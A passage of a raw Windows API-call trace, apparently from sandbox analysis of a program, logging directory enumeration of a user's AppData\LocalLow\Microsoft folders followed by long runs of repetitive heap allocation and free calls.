lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\cryptneturlcache\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0202.924] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.924] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0202.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e917a8 [0202.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e918d8 [0202.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0202.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0202.924] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0202.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e917a8 [0202.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0202.924] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0202.924] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0202.925] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0202.925] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0202.925] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0202.925] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0202.925] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0202.925] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0202.925] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0202.925] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0202.925] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0202.925] PathFindFileNameW (pszPath="") returned="" [0202.925] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0202.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e918d8 | out: hHeap=0x620000) returned 1 [0202.927] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.927] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0202.927] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 0 [0202.927] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0202.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0202.928] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0202.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0202.928] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0202.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0202.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0202.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.959] 